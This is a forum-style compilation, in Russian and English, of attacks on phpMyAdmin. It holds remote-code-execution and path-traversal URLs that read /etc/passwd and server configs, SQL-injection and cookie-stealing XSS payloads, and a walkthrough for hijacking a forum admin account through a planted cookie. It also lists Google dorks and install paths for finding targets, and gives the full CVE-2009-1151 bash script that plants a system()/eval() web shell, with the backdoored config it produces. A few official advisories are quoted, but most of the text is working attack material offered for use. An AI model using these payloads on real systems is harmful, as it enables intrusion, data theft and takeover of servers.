Vulnerability


2.2.0rc3
http://victim/phpmyadmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru('cat%20/etc/passwd')."
Эксплоит дает выполнение произвольного кода.

2.3.2
http://target.com/phpMyAdmin/tbl_properties_structure.php?lang=<SQL INJECTION>
SQL-injection

2.5.*
phpMyAdmin 2.5.7 Remote code injection Exploit (http://milw0rm.com/exploits/309)
Эксплоит дает выполнение произвольного кода.

2.5.5-pl1 and prior
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
Эксплоит дает чтение файла / выполнение произвольного кода.

2.6.4-pl1
phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit (http://milw0rm.com/exploits/1244)
Эксплоит дает чтение любого фала.

HTML-Exploit:
<CENTER>
<A HREF="http://www.securityreason.com><IMG
SRC="http://securityreason.com/gfx/small_logo.png"></A><P>
<FORM action="http://74.69.111.236:4681/phpmyadmin/libraries/grab_globals.lib.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>


2.7.0
http://victim/phpmyadmin/server_privileges.php?server=1&checkprivs='
http://victim/phpmyadmin/server_privileges.php?server=1&hostname='&username=1&dbname=1&tablename=1
SQL-injection


2.11.2
SQL-injection + XSS
12 ноября, 2007
Программа: phpMyAdmin 2.11.2, возможно более ранние версии

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "db" в сценарии db_create.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости атакующий должен иметь привилегии CREATE DATABASE и браузер жертвы должен выполнять JavaScript код в теге img (например, Opera).

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "db" в сценарии db_create.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для успешной эксплуатации уязвимости атакующий должен иметь привилегии CREATE DATABASE.


other:
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No



XSS (Cross-site Scripting) :

2.6.0-pl2 and prior
http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></
http://[target]/[phpMyAdmin_directory]/read_dump .php?sql_query=set%20@1=1&zero_rows=<script>alert(document.cookie)</script>

prior to 2.6.2-rc1
http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><sc ript>alert(document.cookie)</script>
http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1>

2.8.0.1
http://example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22
index.php?set_theme=%3Cscript%3Ealert('Powered By Expaethitec');%3C/script%3E

2.9.x
http://site.com/phpmyadmin/sql.php?db=information_schema&
token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=[xss]


other:
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg=777777%22%3E%3CH1%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
/phpmyadmin/db_create.php?token=your_token&reload=1&db=[double xss(2 followed xss)]
/phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
/phpmyadmin/querywindow.php?token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]


Full path disclosure :
/scripts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang[]=
/index.php?target[]=
/index.php?db[]=
/index.php?goto[]=
/left.php?server[]=
/index.php?table[]=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group[]=
/db_printview.php?db="
/sql.php?back[]=
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)


dork:
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
intitle:"index of/phpmyadmin"
phpMyAdmin "running on" inurl:"main.php"
phpMyAdmin dumps
"phpMyAdmin" "running on" inurl:"main.php"
filetype:txt | filetype:sql ("phpMyAdmin SQL Dump"|"phpMyAdmin MySQL-Dump")
intitle:"index of /phpmyadmin" -tar
allinurl:/tbl_properties_structure.php?
inurl:main.php "Welcome to phpMyadmin" -"No Privileges" +"runtime" -"as root@"
http://www.google.com/search?hl=en&amp;lr=&amp;c2coff=1&amp;q=intext:"welcome to phpmyadmin" -login -"no privileges" "Create new database [Documentation]" inurl:phpmyadmin -demo



[B]Files locations
/phpm/
/phpmy/
/phpmyadmin/
/PMA/
/mysql/
/admin/
/db/
/dbadmin/
/web/phpMyAdmin/
/admin/pma/
/admin/phpmyadmin/
/admin/mysql/
/phpmyadmin2/
/mysqladmin/
/mysql-admin/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/myadmin/
/phpMyA/
/phpmyad/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmi/
/phpMyAdmin1/
/phpMyAdmin2/
/phpMyAdmin-2/
/phpMyAdmin-2.10.0/
/phpMyAdmin-2.3.0/
/phpMyAdmin-2.3.1/
/phpMyAdmin-2.3.2/
/phpMyAdmin-2.3.3/
/phpMyAdmin-2.3.4/
/phpMyAdmin-2.3.5/
/phpMyAdmin-2.3.6/
/phpMyAdmin-2.3.7/
/phpMyAdmin-2.3.8/
/phpMyAdmin-2.3.9/
/phpMyAdmin-2.4.0/
/phpMyAdmin-2.4.1/
/phpMyAdmin-2.4.2/
/phpMyAdmin-2.4.3/
/phpMyAdmin-2.4.4/
/phpMyAdmin-2.4.5/
/phpMyAdmin-2.4.6/
/phpMyAdmin-2.4.7/
/phpMyAdmin-2.4.8/
/phpMyAdmin-2.4.9/
/phpMyAdmin-2.5.0/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.2/
/phpMyAdmin-2.5.3/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.8/
/phpMyAdmin-2.5.9/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.6.5/
/phpMyAdmin-2.6.6/
/phpMyAdmin-2.6.7/
/phpMyAdmin-2.6.8/
/phpMyAdmin-2.6.9/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.7.1/
/phpMyAdmin-2.7.2/
/phpMyAdmin-2.7.3/
/phpMyAdmin-2.7.4/
/phpMyAdmin-2.7.5/
/phpMyAdmin-2.7.6/
/phpMyAdmin-2.7.7/
/phpMyAdmin-2.7.8/
/phpMyAdmin-2.7.9/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/phpMyAdmin-2.8.3/
/phpMyAdmin-2.8.4/
/phpMyAdmin-2.8.5/
/phpMyAdmin-2.8.6/
/phpMyAdmin-2.8.7/
/phpMyAdmin-2.8.8/
/phpMyAdmin-2.8.9/
/phpMyAdmin-2.9.1/
/phpMyAdmin-2.9.2/
/phpMyAdmin-3/
/phpMyAdmin-4/
/phpMyAds/
/phpmyad-sys/


phpMyAdmin security announcement (http://www.phpmyadmin.net/home_page/security.php)

Announcement-ID: PMASA-2008-1
Date: 2008-03-01
Updated: 2008-03-03

Summary:
SQL injection vulnerability (Delayed Cross Site Request Forgery)

Description:
We received an advisory from Richard Cunningham, and we wish to thank him for his work. phpMyAdmin used the $_REQUEST superglobal as a source for its parameters, instead of $_GET and $_POST. This means that on most servers, a cookie with the same name as one of phpMyAdmin's parameters can interfere.
Another application could set a cookie for the root path "/" with a "sql_query" name, therefore overriding the user-submitted sql_query because by default, the $_REQUEST superglobal imports first GET, then POST then COOKIE data.

Severity:
We consider this vulnerability to be serious.

Mitigation factor:
An attacker must trick the victim into visiting a page on the same web server where he has placed code that creates a malicious cookie.

Affected versions:
Versions before 2.11.5.

Solution:
Upgrade to phpMyAdmin 2.11.5 or newer, where $_REQUEST is rebuilt to not contain cookies.

заметка на офф. сайте. (http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-1)
Пример использования:
У нас имеется сайт на котором стоит phpmyadmin (кстати не особо важно даже где, главное чтоб стоял и админ в него заходил), форум (для примера ipb) и скрипт подверженный активной xss (для примера возьмём теоретическую активку в пм ipb). Отправляем админу кодес с xss (важно знать префикс используемый на форуме).
Кодес:
<script>
document.cookie="sql_query=update ibf_members set mgroup=4 where id=31337; path=/; expires=Mon, 01-Jan-2009 00:00:00 GMT";
</script>
ibf_ - префикс форума
4 - админская группа
31337 - наш id на форуме

После "заражения" xss'кой админа остаётся только ждать когда он зайдёт в phpmyadmin. Там уже выполняемый админом sql запрос перепишется и сделает нас админом форума (при данном значении параметра sql_query). Для беспалевности можно "поиграть" с параметром expires.

PS на данный момент уязвимости подвержены практически все пхпмайадмины (не успели обновиться, бгг))

еще пару XSS, в версии 2.6.1 работают, последние версии не уязвимы:
http://site/phpMyAdmin/index.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>http://site/phpMyAdmin/calendar.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>и т.д.
register globals и magic qoutes неважны

http://localhost/Tools/phpMyAdmin/mult_submits.inc.php?submit_mult=1&what=1&strDoYouReally=<script>alert(5555)</script>
register_globals on

поидее и в последних версиях этот скрипт уязвим, но он перенесен в libraries и немного изменен, в 2.11.5 эксплуатируется так:
http://localhost/Tools/phpMyAdmin/libraries/mult_submits.inc.php?submit_mult=1&what="><script>alert(5555)</script>
но помоему в последних версиях по умолчанию доступ к скрипту запрещен, с помощью .htaccess

It is a variable that was not cleaned in a way, allowing you to inject SQL code into the cookie. Here is a example of a small vulnerable php script.

<?php
$user['id'] = $_COOKIE['uid'];
$query = "SELECT name, password FROM members where uid='" . $user['id'] . "'";
$query = mysql_query($query);
$name = mysql_result($query, 0);
echo 'Hello ' . $name . '!';
?>


If it is a normal user, it would display a perfectly good name like "Hello Admin!".
You can now use a thing such the extention for firefox called Cookie Editor, and modify the cookie, you can also do this with javascript.
You then edit the cookie's value, it would have been something like "12", but after editing and adding sql code to it, it would be something like "-1 UNION ALL SELECT USER(), NULL FROM mysql.user--".
That will change the query, and display the user connected to the database, instead of the name of the user stored in the database.
That will result in the following being echo'd; "Hello root@localhost".

(c) h4cky0u (http://h4cky0u.org/viewtopic.php?f=2&t=21736)

Vulnerable:


Typo3 phpMyAdmin 3.2
Typo3 phpMyAdmin 3.0.1
Typo3 phpMyAdmin 3.0
Typo3 phpMyAdmin 0.2.2
Turbolinux Appliance Server 3.0 x64
Turbolinux Appliance Server 3.0
phpMyAdmin phpMyAdmin 2.11.9
phpMyAdmin phpMyAdmin 2.11.8
phpMyAdmin phpMyAdmin 2.11.7
phpMyAdmin phpMyAdmin 2.11.5 1
phpMyAdmin phpMyAdmin 2.11.5
phpMyAdmin phpMyAdmin 2.11.4
phpMyAdmin phpMyAdmin 2.11.1
phpMyAdmin phpMyAdmin 2.9.1
phpMyAdmin phpMyAdmin 2.9.2-rc1
phpMyAdmin phpMyAdmin 2.9.1.1
phpMyAdmin phpMyAdmin 2.11.8.1
phpMyAdmin phpMyAdmin 2.11.5.2
phpMyAdmin phpMyAdmin 2.11.2.2
phpMyAdmin phpMyAdmin 2.11.2.1
phpMyAdmin phpMyAdmin 2.11.1.2
phpMyAdmin phpMyAdmin 2.11.1.1
phpMyAdmin phpMyAdmin 2.10.0.2
phpMyAdmin phpMyAdmin 2.10.0.1
phpMyAdmin phpMyAdmin 2.10.0.1


Exploit:

http://www.example.com/server_databases.php?pos=0&amp;dbstats=0&amp;sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&amp;sort_order=desc&amp;token=[valid token]

Выполнение произвольного PHP-кода на сервере, включая вызов внешних команд через PHP-функцию exec().

Решение:

Upgrade to phpMyAdmin 2.11.9.1 or newer.

Not Vulnerable:


Typo3 phpMyAdmin 3.3
phpMyAdmin phpMyAdmin 2.11.9 .1


www.phpmyadmin.net (http://www.phpmyadmin.net/home_page/security.php%3Fissue%3DPMASA-2008-7)

бага разобрана тут (https://forum.antichat.net/threadnav46016-341-10.html)

бага разобрана тут (https://forum.antichat.net/threadnav46016-341-10.html)

Также можно добавить: бага работает с версии [ phpMyAdmin 2.9.0-beta1 => ]

phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability
______________________
http://www.milw0rm.com/exploits/7382

XSS
[CODE]http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]

http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]

http://[server]/server_privileges.php?token=[SID]&username=[XSS]

http://[server]/server_privileges.php?token=[SID]&username=[XSS]

http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]

http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]

http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`

http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true

http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4&
single_table=true
Оригинал: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html

Также можно добавить: бага работает с версии [ phpMyAdmin 2.9.0-beta1 => ]
:) Еще бы добавил:
Работает на мускуле 4
На 5 - не работает.
По крайней мере у меня.
ТОлько что протестил.) (хорошо что там где надо стоит 4))))

calendar.php?GLOBALS

иожно узнать точную версию, если > 3.*

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
exit
fi

if ! which curl >/dev/null
then
echo "sorry but you need curl for this script to work!"
echo "on Debian/Ubuntu: sudo apt-get install curl"
exit
fi


function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22h ost%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22conne ct_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth _type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b} }}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host %27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cp re%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3be val"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b s:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%2 2%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:% 22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"

echo "[+] attempting to inject phpinfo() ..."
curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
then
curl -ks --url "$3/config/config.inc.php" >$flag
echo "[+] success! phpinfo() injected successfully! output saved on $flag"
curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
echo " $3/config/config.inc.php?c=ls+-l+/"
echo " $3/config/config.inc.php?p=phpinfo();"
echo " please send any feedback/improvements for this script to"\
"unknown.pentester<AT_sign__here>gmail.com"
else
echo "[+] no luck injecting to $3/config/config.inc.php :("
exit
fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
length=`echo -n $token | wc -c`

# valid form token obtained?
if [[ $length -eq 32 ]]
then
echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
# attempt exploit!
exploit $token $cookiejar $1
else
echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
exit
fi
else
echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
exit
fi

# milw0rm.com [2009-06-09]

CVE-2009-1151 (http://web.nvd.nist.gov/view/vuln/detail?execution=e3s1) (phpmyadminrcesh.txt (http://www.gnucitizen.org/static/blog/2009/06/phpmyadminrcesh.txt)) PMASA-2009-3 (http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php) PMASA-2009-4 (http://www.phpmyadmin.net/home_page/security/PMASA-2009-4.php)

<?php
/*
* Generated configuration file
* Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>
* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
* Date: Tue, 09 Jun 2009 14:13:34 GMT
*/

/* Servers configuration */
$i = 0;

/* Server (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */

?>

phpMyAdmin//config/config.inc.php?c=ls+-l+/
phpMyAdmin//config/config.inc.php?p=phpinfo();

Vulnerable software and versions:
phpmyadmin:3.1.3
phpmyadmin:3.1.3:rc1
phpmyadmin:3.1.2
phpmyadmin:3.1.2:rc1
phpmyadmin:3.1.1
phpmyadmin:3.1.1:rc1
phpmyadmin:3.1.0
phpmyadmin:2.11.9.3
phpmyadmin:2.11.9.4
phpmyadmin:2.11.9.2
phpmyadmin:2.11.9.1
phpmyadmin:2.11.9.0
phpmyadmin:2.11.9
phpmyadmin:2.11.8
phpmyadmin:2.11.7.12.11.7.1
phpmyadmin:2.11.7.0
phpmyadmin:2.11.7
phpmyadmin:2.11.6:rc1
phpmyadmin:2.11.6.0
phpmyadmin:2.11.6
phpmyadmin:2.11.5:rc1
phpmyadmin:2.11.5.2
phpmyadmin:2.11.5.1
phpmyadmin:2.11.5.0
phpmyadmin:2.11.5
phpmyadmin:2.11.4:rc1
phpmyadmin:2.11.4
phpmyadmin:2.11.3:rc1
phpmyadmin:2.11.3.0
phpmyadmin:2.11.3
phpmyadmin:2.11.2.2
phpmyadmin:2.11.2.1
phpmyadmin:2.11.2.0
phpmyadmin:2.11.2
phpmyadmin:2.11.1:rc1
phpmyadmin:2.11.1.2
phpmyadmin:2.11.1.1
phpmyadmin:2.11.1.0
phpmyadmin:2.11.1
phpmyadmin:2.11.0:rc1
phpmyadmin:2.11.0:beta1
phpmyadmin:2.11.0

По поводу full path disclosure
В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют

Files locations
/php-my-admin/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/

По поводу уязвимости phpMyAdmin (/scripts/setup.php) PHP Code Injection добавлю что phpMyAdmin 2.8.x также уязвима.
Проверял на phpMyAdmin 2.8.0.3 Главное чтобы права на запись были (

По поводу full path disclosure
В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют
libraries/config.default.php

$cfg['ShowPhpInfo'] = false;

Все зависит от настроек. по дефолту выключено.

phpMyAdmin SQL bookmark HTML Injection Vulnerability
Bugtraq ID: 35543
Class: Input Validation Error
CVE: CVE-2009-2284
Remote: Yes
Local: No
Published: Jun 30 2009 12:00AM
Updated: Aug 21 2009 03:57PM
Credit: Sven Vetsch
Vulnerable: RedHat Fedora 9 0
RedHat Fedora 11
RedHat Fedora 10
phpMyAdmin phpMyAdmin 3.1.1 1
phpMyAdmin phpMyAdmin 3.1.1 0
phpMyAdmin phpMyAdmin 3.1 0
phpMyAdmin phpMyAdmin 3.0.1
phpMyAdmin phpMyAdmin 3.0
phpMyAdmin phpMyAdmin 3.2.0-rc1
phpMyAdmin phpMyAdmin 3.1.3.2
phpMyAdmin phpMyAdmin 3.1.3.1
phpMyAdmin phpMyAdmin 3.0.1.1
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
Эксплойта или более конкретного описания в инете не нашел. Покопался сам:
/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E

как узнать точную версию phpMyAdmin

Раскрытие путей
phpMyAdmin 2.6.1

http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection='


Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\l
calhost\www\Tools\phpmyadmin\header.inc.php on line 132

Уязвимая часть :
function PMA_reloadNavigation() {
global $cfg;

// Reloads the navigation frame via JavaScript if required
if (isset($GLOBALS['reload']) && $GLOBALS['reload']) {
echo "\n";
$reload_url = './left.php?' . PMA_generate_common_url((isset($GLOBALS['db']) ? $GLOBALS['db'] : ''), '', '&');
?>
<script type="text/javascript" language="javascript1.2">
<!--
if (typeof(window.parent) != 'undefined'
&& typeof(window.parent.frames['nav']) != 'undefined') {
window.parent.frames['nav'].goTo('<?php echo $reload_url; ?>&hash=' + <?php echo (($cfg['QueryFrame'] && $cfg['QueryFrameJS']) ? 'window.parent.frames[\'queryframe\'].document.hashform.hash.value' : "'" . md5($cfg['PmaAbsoluteUri']) . "'"); ?>);
}
//-->
</script>
<?php
unset($GLOBALS['reload']);
}
}

UPD
http://localhost/Tools/phpMyAdmin/footer.inc.php
